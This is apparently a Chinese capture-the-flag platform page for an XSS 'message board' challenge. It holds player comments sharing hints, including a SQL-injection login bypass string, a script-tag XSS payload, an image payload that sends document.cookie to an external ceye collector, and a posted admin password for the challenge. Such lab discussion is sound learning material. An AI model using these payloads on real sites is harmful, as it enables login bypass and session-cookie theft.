留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3345
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
Gcysnd 8天前

挺容易,挖到admin后台/admin.php用1' or '1' = '1' --万能用户名登录后发现存在html注入点,于是聊天室发送<script>alert(cookie)</scirpt>找到flag

回复 0
xxsko 3天前

万能用户名你可以?我用你这个也不行1' or '1' = '1' --万能用户名

回复 0

2333m 15天前

触发xss需要登录后台/admin.php, admin/011be4d65feac1a8 (通过翻评论区找到的,据说是dirsearch跑出来admin.php和db.sql,但是我没找到)

回复 0

YS_JW 1月前

我在img图片位置直接插入http://{ceye平台}/?cookie='+document.cookie+',ceye那边有回显,但是cookie没有被带出来,直接以?cookie=\%27+document.cookie+\%27形式返回了,去掉'后也是直接以document.cookie字符返回,这是为啥哦,问ai也没问出来原因

回复 0

BLX123 4月前

想用python的h(ttp)协议来接收xss,自身得是一个公网IP反弹才能定位到自己

回复 0

网恋秀牛子被录屏导致自卑 4月前

ceye,xsspt,xss.aq要么收不到要么收费,我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag

回复 0

igrazee 5月前

flag{*******}

回复 0

TTxyz 7月前

啥题啊?不登陆怎么回显的???还有那个db.sql扫不出来啊,我直接访问也是无法连接???

回复 0

solomom 7月前

感觉这道题目被改了很多,我看之前的评论,用了dirsearch只能找了admin.php,没有db.sql,而用了几个xss平台也没有回显,只有登录到了后台才会跳出来所有的xss回显,当前可以尝试一下sql盲注。

回复 0

韭菜叶花肉来个茶蛋 8月前

现在正常做出来的选手,有没有能解释下的

回复 0

qfgk16 9月前

xss根本不会回显,s||||b题目,骗金币的

回复 0
qfgk16 9月前

@妈!有人打我 谢谢

回复 0

妈!有人打我 9月前

@qfgk16 http://ceye.io/ 注册下就可以了

回复 0

qfgk16 9月前

@妈!有人打我 有什么能用的平台吗

回复 0

妈!有人打我 9月前

可以的 应该是你xss平台不可以接受http协议

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(19)

解题动态

yinlin 攻破了该题 9小时前
念旧 攻破了该题 14小时前
Anonymous.. 攻破了该题 14小时前
admincon 攻破了该题 17小时前
粉红色的-毛 攻破了该题 2天前
一只十五 攻破了该题 3天前
xxsko 攻破了该题 3天前
aaaa1111 攻破了该题 3天前
thexx 攻破了该题 4天前
flag与她皆失 攻破了该题 6天前
3024769318 攻破了该题 7天前
xyjwkg 攻破了该题 8天前
Gcysnd 攻破了该题 8天前
shengood 攻破了该题 9天前
余生 攻破了该题 13天前
蟹不揉 攻破了该题 13天前
love_islet 攻破了该题 14天前
2333m 攻破了该题 15天前
echk 攻破了该题 16天前
edadsadw 攻破了该题 17天前
问题反馈